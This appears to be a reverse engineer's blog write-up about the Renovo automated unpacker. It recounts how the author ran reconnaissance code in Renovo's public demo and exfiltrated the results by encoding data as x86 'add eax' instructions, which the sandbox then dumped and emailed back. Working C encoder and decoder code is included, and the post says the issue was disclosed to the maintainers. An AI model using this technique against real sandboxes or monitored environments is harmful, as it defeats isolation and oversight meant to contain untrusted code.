Renovo is an automated "unpacking" tool developed by BitBlaze at UC Berkeley. The notion behind Renovo is that packers frequently encrypt and/or compress regions of code at the time of protection, and decrypt/decompress these regions while the packer executes. The Renovo paper terms these regions "hidden code", and the goal of Renovo as a system is to retrieve the hidden code regions generated throughout packer execution.
(Note that Renovo is not what we might consider a truly automated unpacker, as it does not attempt to reconstruct working executables. For example, it does not undo protections applied to imported symbols, and it ignores other forms of protection such as virtualization obfuscation.)
Renovo is built atop QEMU, and performs a watered-down form of dynamic taint analysis. Namely, every time the packer code writes to memory, the written addresses are considered "dirty", with such information being recorded in a table. Then, for every instruction executed throughout the course of packer execution, Renovo queries the dirty-address table to determine whether the instruction's address has previously been overwritten. If this is the case, Renovo considers this moment in time as beginning the execution of "hidden code". It makes a note of the event, and dumps the surrounding dirty regions. This simple technique is very effective in tracking execution within memory regions that have previously been written.
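The bookkeeping described above can be sketched in a few lines of C. This is only a toy model under my own assumptions, not Renovo's actual implementation: the names `dirty_map`, `on_write`, `is_dirty` and `dirty_region`, the one-bit-per-byte layout and the 4 KB address space are all hypothetical, chosen to keep the example small.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define TOY_MEM_SIZE 4096u  /* hypothetical toy address space, in bytes */

/* One dirty bit per byte of the toy address space. */
typedef struct {
    uint8_t bits[TOY_MEM_SIZE / 8];
} dirty_map;

static void dirty_init(dirty_map *m)
{
    memset(m->bits, 0, sizeof m->bits);
}

/* Hook for every memory write: mark [addr, addr + len) as dirty. */
static void on_write(dirty_map *m, uint32_t addr, uint32_t len)
{
    assert(addr <= TOY_MEM_SIZE && len <= TOY_MEM_SIZE - addr);
    for (uint32_t a = addr; a < addr + len; ++a)
        m->bits[a >> 3] |= (uint8_t)(1u << (a & 7));
}

/* Hook for every executed instruction: was this address written earlier? */
static bool is_dirty(const dirty_map *m, uint32_t pc)
{
    assert(pc < TOY_MEM_SIZE);
    return ((m->bits[pc >> 3] >> (pc & 7)) & 1u) != 0;
}

/* Find the contiguous dirty range [*start, *end) surrounding a dirty pc,
 * i.e. the region a tool of this kind would dump. */
static void dirty_region(const dirty_map *m, uint32_t pc,
                         uint32_t *start, uint32_t *end)
{
    uint32_t lo = pc, hi = pc;
    while (lo > 0 && is_dirty(m, lo - 1))
        --lo;
    while (hi + 1 < TOY_MEM_SIZE && is_dirty(m, hi + 1))
        ++hi;
    *start = lo;
    *end = hi + 1;
}
```

In this model, the emulator would call `on_write` from its store path and `is_dirty` before each instruction; the first time `is_dirty` returns true for the program counter, the range reported by `dirty_region` is the "hidden code" to dump.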
For a brief period of time, the folks at BitBlaze put Renovo online for public evaluation. It had a web interface allowing the user to upload malicious binaries. The system then ran the binaries through Renovo, collected all of the hidden code regions gathered on a particular run, and emailed the results to the user.
Since I am a reverse engineer, I could not resist the temptation to screw around with this system. In particular, I wanted to know whether there was any secret sauce running inside of the emulated environment (beyond the modifications to QEMU). The nature of the public demonstration allowed me to run code of my choosing within the Renovo environment. I.e., I could enumerate the file system, the drivers, registry keys of my choosing, and so on. But how was I going to exfiltrate the results?
After some thought, I realized that if I could turn the data into code and execute it, Renovo would happily email it back to me, because that is exactly what it was designed to do.
In particular, suppose I wish to exfiltrate the contents of some buffer filled with reconnaissance data. First, allocate RWX memory of an appropriate size. Now, let's consider our data buffer as a collection of 32-bit integers. Take the first integer, dw0, and use it to create the instruction "add eax, dw0", i.e., "05 XX YY ZZ WW", where dw0 is 0xWWZZYYXX. Repeat this process for all integers within the buffer. At the end, write a "retn" instruction, i.e., 0xC3. Now execute this piece of freshly-generated code.
Renovo will detect this as "hidden code" executed by the process, and send the entire piece of allocated memory back to me. From there, it is a simple matter to strip out the "05" bytes (corresponding to "add eax, dword") and the trailing "C3" byte ("retn"), and reconstruct the original data buffer. The very first dword emitted is the length of the buffer, so the receiving end knows how many bytes to keep. The code looked roughly as follows:
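    #include <windows.h>
    #include <string.h>

    /* Emit "add eax, imm32": opcode 05 followed by the little-endian immediate. */
    #define DWORD_AS_CODE(ptr, value) do { \
            DWORD v_ = (DWORD)(value);     \
            *(ptr)++ = 0x05;               \
            memcpy((ptr), &v_, 4);         \
            (ptr) += 4;                    \
        } while (0)
    typedef void (*fptr)(void);

    void exfiltrate(unsigned int len, const char *buf)
    {
        unsigned int ndwords = (len + 3) >> 2;  /* data dwords, rounded up */
        /* 5 bytes per instruction (length dword + data dwords), plus 1 for RETN */
        unsigned char *exfil = (unsigned char *)VirtualAlloc(NULL,
            5 * ((SIZE_T)ndwords + 1) + 1, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        fptr fp = (fptr)exfil;
        if (exfil == NULL)
            return;
        DWORD_AS_CODE(exfil, len);              /* length prefix */
        for (unsigned int i = 0; i < ndwords; ++i) {
            DWORD dw = 0;                       /* zero-pad a partial final dword */
            unsigned int n = len - 4 * i;
            memcpy(&dw, buf + 4 * i, n < 4 ? n : 4);
            DWORD_AS_CODE(exfil, dw);
        }
        *exfil = 0xC3;                          /* RETN */
        fp();
    }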
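The receiving side is the mirror image. Here is a minimal sketch of a decoder, assuming the dump starts exactly at the first "05" byte and follows the layout produced above (a length dword, then the data dwords, then "C3"). The function name `decode_dump` and its error convention are my own inventions for illustration; the actual dump files may well have carried extra framing that would need to be stripped first.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Read the little-endian 32-bit immediate that follows an 05 opcode. */
static uint32_t read_imm32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Recover the original buffer from a dump of the generated code.
 * Returns the number of bytes written to out, or -1 if the dump is
 * malformed or out is too small. */
static long decode_dump(const uint8_t *dump, size_t dump_len,
                        uint8_t *out, size_t out_cap)
{
    assert(dump != NULL && out != NULL);

    /* Smallest valid dump: one length instruction plus RETN. */
    if (dump_len < 6 || dump[0] != 0x05)
        return -1;

    uint32_t len = read_imm32(dump + 1);
    if (len > out_cap || len > dump_len)
        return -1;

    size_t ndwords = (size_t)len / 4 + (len % 4 != 0);
    size_t need = 5 * (ndwords + 1) + 1;   /* all instructions + RETN */
    if (dump_len < need)
        return -1;

    const uint8_t *p = dump + 5;
    size_t written = 0;
    for (size_t i = 0; i < ndwords; ++i, p += 5) {
        if (p[0] != 0x05)                  /* expect "add eax, imm32" */
            return -1;
        size_t left = (size_t)len - written;
        size_t chunk = left < 4 ? left : 4;
        memcpy(out + written, p + 1, chunk);  /* immediate bytes are the data */
        written += chunk;
    }
    if (p[0] != 0xC3)                      /* expect the trailing RETN */
        return -1;
    return (long)written;
}
```

Because x86 stores the immediate in little-endian order, the four bytes after each "05" are the original buffer bytes in their original order, so no byte swapping is needed; the length prefix is only used to drop the padding in the final dword.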
It worked like a charm. I played around dumping various things out of the virtual environment until I got bored, then emailed my findings to the project maintainers, who promptly took the service offline and never brought it back.